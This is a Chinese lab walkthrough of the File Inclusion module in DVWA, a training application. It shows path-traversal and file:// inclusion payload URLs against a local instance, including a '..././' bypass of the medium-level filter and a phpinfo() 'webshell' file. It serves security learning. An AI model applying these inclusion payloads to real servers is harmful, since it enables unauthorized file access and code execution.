DVWA(4)文件包含(File Inclusion) LOW-HIGHT 操作记录
今天带来第四期文件包含漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。也感谢之前查阅的各种大神提供的博客。
php文件包含分为两种:
本地文件包含LFI(Local File Inclusion) 当被包含的文件在服务器本地时,就形成本地文件包含
远程文件包含RFI(Remote File Inclusion) 当被包含的文件在第三方服务器时,叫做远程文件包含
Low级别
本地文件包含方法:
分别点击三个php文件,后缀为page=文件名
将后缀修改为,得到了绝对路径
phpinfo.php
远程文件包含方法:
编写一句话木马文档,命名为webshell.txt
<?php phpinfo();?>
利用文件上传的原理
将后缀命改为
http://127.0.0.1/vulnerabilities/fi/?page=../../hackable/uploads/webshell.txt
Medium级别
分析源码,将../ ..\过滤,我们可以使用.../代替
<?php// The page we wish to display
$file = $_GET[ 'page' ];// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );?>
将后缀修改为
http://127.0.0.1/vulnerabilities/fi/?page=..././..././hackable/uploads/webshell.txt
Hight级别
分析源码,要求page参数为file形式
<?php// The page we wish to display
$file = $_GET[ 'page' ];// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}?>
在G盘下新建一个文件,命名为webshell.php 内容为:
<?php phpinfo();?>
将后缀名修改为
http://127.0.0.1/vulnerabilities/fi/?page=file://G:/webshell.php
DVWA(4)文件包含(File Inclusion) LOW-HIGHT 操作记录相关推荐
- DVWA通关--文件包含(File Inclusion)
目录 LOW 通关步骤 一.本地文件包含 二.远程文件包含 代码分析 MEDIUM 通关步骤 一.本地文件包含 二.远程文件包含 代码分析 HIGH 通关步骤 一.本地文件包含 二.远程文件包含 代码 ...
- DVWA远程文件包含防御
在这里推荐下自己的博客,支持友链互换,Back's Blog 本次防御从代码层面出发, 尽量从多个角度进行防御.不足之处请指出.谢谢. 黑名单检测防御 首先看下dvwa的远程文件包含页面源码(low级 ...
- pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)
目录 一.来自官方的简介 二.来自小可爱的通关步骤 第一关 File Inclusion(local) 1.读取"隐藏"文件 2.读取系统文件 3.结合文件上传getshell ...
- LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一.文件包含的基本概念 1.要想成功利用文件包含漏洞,需要满足下面的条件 (1)in ...
- 【web安全】文件包含漏洞
目录 1.什么是文件包含漏洞 2.产生原因 3.文件包含的类型 3.1本地文件包含 3.2远程文件包含 4.攻击利用手法 4.1 file:协议 4.2 php://协议 4.3 zip://,bz ...
- 文件包含和命令注入漏洞
文件包含和命令注入漏洞 文件包含漏洞 介绍 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,让服务器端执行,代码注入的典型代表就是文件包含file inclusion.文件包含 ...
- 【文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
文件包含漏洞 文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include ...
- DVWA靶机-文件上传漏洞(File Upload)
DVWA靶机-文件上传漏洞(File Upload) 文件上传漏洞的四个等级,low,medium,high,impossible,今天我们针对于不同的等级进行基于文件上传漏洞的攻击 DVWA靶机-暴 ...
- DVWA——文件包含
File Inclusion学习 文件包含简介 实战:DVWA--文件包含 文件包含简介 一.文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执 ...
最新文章
- mysql 流复制_MySQL系列详解六:MySQL主从复制/半同步演示-技术流ken
- iShow UI for React 最佳实践
- Python基础教程:函数的可变参数
- 一个springboot能支持多少并发_吃透这篇,你也能搭建出一个高并发和高性能的系统...
- SQLite入门之数据类型
- 计算机考研没奖,备战考研本科期间没有什么奖项,考研复试会有影响吗?
- windows软链接的建立及删除
- SpringBoot 中 @Transactional 的使用
- python求解LeetCode习题Compare Version Numbers
- ae效果英文版翻译对照表_AE中英文对照
- 计算机电子智能化贰级,电子与智能化工程专业承包资质分为一级、二级
- ov5640帧率配置_ov5640不改变pclk的情况下,通过缩小输出图像大小来提高输出帧率...
- frida-trace入门
- 记参加Microsoft Ignite 大会和北京CSDN创作者之夜
- 6个Web前端值得收藏很实用的菜单模板(上)
- 桌面计算机密码修改频率,教大家如何更改电脑的显示频率
- ajax爬虫小案例(百度翻译)
- python爬虫安装教程_环境安装-Python 原生爬虫教程 | IT大叔
- MT7603处理器性能,MT7603 wifi芯片介绍
- opencv2 加载RTSP视频流,内存溢出的问题
热门文章
- 安徽工程大学计算机考研分数线,2021安徽工程大学研究生分数线一览表(含2019-2020历年复试)...
- Eclipse OSBP 设置 配置
- SLAM算法知识荟萃
- stm32关定时器_【菜鸟必看】stm32定时器的妙用
- 自动驾驶算法详解(1) : Apollo路径规划 Piecewise Jerk Path Optimizer的python实现
- 【每日一题】 1396. 设计地铁系统
- 读书笔记-《水煮三国》
- 影视解析Xyplayer 3.94源码
- 科笛上市一度破发:公司市值67亿港元 红杉与云锋是股东
- eclipse maven配置usersetting时出现Could not read settings.xml